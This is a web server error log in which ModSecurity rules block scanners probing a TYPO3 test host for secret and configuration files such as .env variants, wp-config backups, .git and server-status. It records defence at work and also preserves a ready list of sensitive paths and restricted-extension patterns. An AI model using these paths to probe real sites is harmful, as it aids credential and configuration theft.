[Sun Mar 15 10:46:55.773787 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "abaADwY2Zu5JILf9IpngpgAAAAc"]
[Sun Mar 15 10:46:55.773929 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "abaADwY2Zu5JILf9IpngpgAAAAc"]
[Sun Mar 15 10:46:55.796367 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "abaADwY2Zu5JILf9IpngpwAAAAc"]
[Sun Mar 15 10:46:55.796573 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "abaADwY2Zu5JILf9IpngpwAAAAc"]
[Sun Mar 15 10:46:55.798040 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "abaADwY2Zu5JILf9IpngpwAAAAc"]
[Sun Mar 15 10:46:55.821735 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "abaADwY2Zu5JILf9IpngqAAAAAc"]
[Sun Mar 15 10:46:55.821905 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "abaADwY2Zu5JILf9IpngqAAAAAc"]
[Sun Mar 15 10:46:55.822035 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "abaADwY2Zu5JILf9IpngqAAAAAc"]
[Sun Mar 15 10:46:55.844289 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "abaADwY2Zu5JILf9IpngqQAAAAc"]
[Sun Mar 15 10:46:55.844454 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "abaADwY2Zu5JILf9IpngqQAAAAc"]
[Sun Mar 15 10:46:55.844569 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "abaADwY2Zu5JILf9IpngqQAAAAc"]
[Sun Mar 15 10:46:55.867024 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.qa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "abaADwY2Zu5JILf9IpngqgAAAAc"]
[Sun Mar 15 10:46:55.867180 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "abaADwY2Zu5JILf9IpngqgAAAAc"]
[Sun Mar 15 10:46:55.867295 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "abaADwY2Zu5JILf9IpngqgAAAAc"]
[Sun Mar 15 10:46:55.889145 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Sun Mar 15 10:46:55.911161 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Sun Mar 15 10:46:55.933353 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Sun Mar 15 10:46:56.062592 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sun Mar 15 10:46:56.470010 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Sun Mar 15 10:46:57.185042 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.old"] [unique_id "abaAEYj6PU2DhLTOjMHC0QAAAAY"]
[Sun Mar 15 10:46:57.185265 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /wp-config.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.old"] [unique_id "abaAEYj6PU2DhLTOjMHC0QAAAAY"]
[Sun Mar 15 10:46:57.185423 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.old"] [unique_id "abaAEYj6PU2DhLTOjMHC0QAAAAY"]
[Sun Mar 15 10:46:57.185543 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.old"] [unique_id "abaAEYj6PU2DhLTOjMHC0QAAAAY"]
[Sun Mar 15 10:46:57.344449 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "abaAEYj6PU2DhLTOjMHC1gAAAAY"]
[Sun Mar 15 10:46:57.344725 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "abaAEYj6PU2DhLTOjMHC1gAAAAY"]
[Sun Mar 15 10:46:57.344916 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "abaAEYj6PU2DhLTOjMHC1gAAAAY"]
[Sun Mar 15 10:46:57.345034 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "abaAEYj6PU2DhLTOjMHC1gAAAAY"]
[Sun Mar 15 10:46:57.674760 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/config/.env"] [unique_id "abaAEYj6PU2DhLTOjMHC4AAAAAY"]
[Sun Mar 15 10:46:57.674962 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/config/.env"] [unique_id "abaAEYj6PU2DhLTOjMHC4AAAAAY"]
[Sun Mar 15 10:46:57.675100 2026] [:error] [pid 2708281] [client 185.177.72.49:29918] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/config/.env"] [unique_id "abaAEYj6PU2DhLTOjMHC4AAAAAY"]
[Sun Mar 15 10:46:57.832230 2026] [authz_core:error] [pid 2708281] [client 185.177.72.49:29918] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/site
[Sun Mar 15 10:46:57.921730 2026] [authz_core:error] [pid 2708281] [client 185.177.72.49:29918] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Sun Mar 15 10:46:57.944072 2026] [authz_core:error] [pid 2708281] [client 185.177.72.49:29918] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.lock
[Mon Mar 16 02:52:27.576423 2026] [authz_core:error] [pid 2726371] [client 195.178.110.157:39514] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 17 19:40:31.834985 2026] [:error] [pid 2762998] [client 216.73.216.51:13752] [client 216.73.216.51] ModSecurity: Warning. Pattern match "^$" at REQUEST_HEADERS:user-agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "628"] [id "920330"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EMPTY_HEADER_UA"] [hostname "surf.test.indacotrentino.com"] [uri "/robots.txt"] [unique_id "abmgH6pA-5OeYReEOJo9agAAAAY"]
[Thu Mar 19 04:34:51.150272 2026] [authz_core:error] [pid 2793943] [client 139.59.132.8:48282] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Thu Mar 19 04:34:55.231224 2026] [:error] [pid 2793944] [client 139.59.132.8:48320] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "abtu3w5PLbbhm9eqtgQvtwAAAAM"]
[Thu Mar 19 04:34:55.231397 2026] [:error] [pid 2793944] [client 139.59.132.8:48320] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "abtu3w5PLbbhm9eqtgQvtwAAAAM"]
[Thu Mar 19 04:34:55.231524 2026] [:error] [pid 2793944] [client 139.59.132.8:48320] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "abtu3w5PLbbhm9eqtgQvtwAAAAM"]
[Thu Mar 19 04:34:56.302544 2026] [:error] [pid 2793941] [client 139.59.132.8:48330] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abtu4A4FqdHUM8keHctlHwAAAAA"]
[Thu Mar 19 04:34:56.302730 2026] [:error] [pid 2793941] [client 139.59.132.8:48330] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abtu4A4FqdHUM8keHctlHwAAAAA"]
[Thu Mar 19 04:34:56.302872 2026] [:error] [pid 2793941] [client 139.59.132.8:48330] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abtu4A4FqdHUM8keHctlHwAAAAA"]
[Thu Mar 19 04:35:00.238057 2026] [authz_core:error] [pid 2793945] [client 139.59.132.8:36362] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Mar 19 04:35:19.316303 2026] [:error] [pid 2793941] [client 139.59.132.8:55474] [client 139.59.132.8] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/trace.axd"] [unique_id "abtu9w4FqdHUM8keHctlJAAAAAA"]
[Thu Mar 19 04:35:19.316541 2026] [:error] [pid 2793941] [client 139.59.132.8:55474] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/trace.axd"] [unique_id "abtu9w4FqdHUM8keHctlJAAAAAA"]
[Thu Mar 19 04:35:19.316665 2026] [:error] [pid 2793941] [client 139.59.132.8:55474] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/trace.axd"] [unique_id "abtu9w4FqdHUM8keHctlJAAAAAA"]
